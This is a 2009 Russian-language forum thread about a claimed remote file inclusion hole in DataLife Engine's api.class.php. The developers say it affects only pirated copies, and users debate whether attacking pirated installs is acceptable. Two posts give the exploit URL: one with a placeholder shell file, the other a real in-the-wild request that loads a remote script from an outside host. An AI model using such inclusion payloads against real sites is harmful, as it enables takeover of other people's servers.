API bug

[КиберБулка 2]

Воть

http://www.site.ru/engine/api/api.class.php?dle_config_api=[shell.txt?]

Изменено 2 сентября 2009 пользователем КиберБулка

[IT-Security 33]

И что?В чём баг то?

API если его вызвать выдаёт всегда белый лист.

Какой нафиг текст шелла?Вы о чём вообще?

Изменено 2 сентября 2009 пользователем IT-Security

[celsoft 6 072]

Что то я также не понял, и причем здесь переменная dle_config_api, ее вообще нет в этом файле.

Ха, увидел где используется dle_config_api, в нелегальных копиях скрипта, ну и ладно нехай их ломают, если подобная уязвимость есть, я даже тестировать ее не буду. Все легальные пользователи могут спать спокойно, у них ничего подобного нет.

[rainbowsix 0]

Радует, что всё норм))

[eph1r 0]

нашел парочку таких :-D

удивлены, наверное

[Captain 623]

нашел парочку таких :-D

удивлены, наверное

Толк, то есть? Заняться нечем?

Изменено 9 сентября 2009 пользователем Captain

[BrillianMedia 8]

delete

Изменено 9 сентября 2009 пользователем BrillianMedia

[IT-Security 33]

Да нет, почему.

Если человек целенаправлено ставит себе пиратскую версию - почему бы и не наказать?Какая разница, что писать абузу провайдеру, что написать посередине сайта "Купи лицензию!".

[Al-x 7]

Да нет, почему.

Если человек целенаправлено ставит себе пиратскую версию - почему бы и не наказать?Какая разница, что писать абузу провайдеру, что написать посередине сайта "Купи лицензию!".

Тогда этим должны заниматься уполномоченые люди, а не пираты. В данном случае Целсофт должен сделать официальное заявление, что мол пиратки будем целенаправлено ломать. Да и то, я не уверен, что это законно... очень-очень врядли такое законно, уже не говоря о принципах разработчика.

А в данному случае получается "узаконивание" "Щас покажу какой я крутой хакер"

[celsoft 6 072]

В данном случае Целсофт должен сделать официальное заявление, что мол пиратки будем целенаправлено ломать.

Зачем, я позиционирую себя гораздо выше и не собираюсь опускаться до подобных вещей. Иногда мне даже сами доступ дают, просять решить какую либо проблему, а выясняется что у человека нелегальная копия, и тем не менее я не считаю что имею право тут же удалять содержимое сайта. Я в таких случаях лишь информирую, не трогая содержимое. Но это официальная позиция. Неофициальная позиция такая что я не осуждаю тех кто например воспользуется данной уязвимостью и взломает нелегальный софт, если человек использующий ворованный скрипт, считает себя правым нарушать чужие права, то он также должен осознавать что значит такое же право имеют и другие люди, которые могут нарушить его права (эффект бумеранга). Другими словами, к людям нужно относиться так, как ты хочешь чтобы они к тебе относились. Если человек пренебрежительно относится к другим, то он должен быть также готов, что точно также обойдутся когда-нибудь и с ним.

[Al-x 7]

Да, именно поэтому я и добавил

уже не говоря о принципах разработчика

Неофициальная позиция такая что я не осуждаю тех кто например воспользуется данной уязвимостью и взломает нелегальный софт

главное, чтобы эту фразу не расценили как "ломайте господа". Т.е. подмена понятий "не осуждаю" с "наказать" Вы то как разработчик имеете права "наказывать"...

Изменено 9 сентября 2009 пользователем Al-x

[demon165 8]

уязвимость существует для лицензии тоже,вызов идёт:/%20%20//engine/api/api.class.php?dle_config_api=http://www.koreadefence.net/data/shirohige/zfxid.txt?

тоесть не нужно даже в корень пихать,вызов будет сделан через удалённый,у моего друга 8.0 лицензия,вчера взломали так,и всё тянеться к корейским сайтам

[WWW.ZEOS.IN 1 161]

Жесть, ппц

Удалил у себя вообще папку api

[pleomax 5]

А у тебя нелегальная копия?

[WWW.ZEOS.IN 1 161]

Лицензия

[IT-Security 33]

Для слепых повторяю - в ЛИЦЕНЗИОННОЙ ВЕРСИИ DLE этого бага НЕТ!

И не нужно гнать, что у Вашего друга/бабушки/тёти стоит лицензия и его сломали.

Этот файл писал ЛИЧНО Я и никаких параметров туда не ставил!API не работает через метод GET!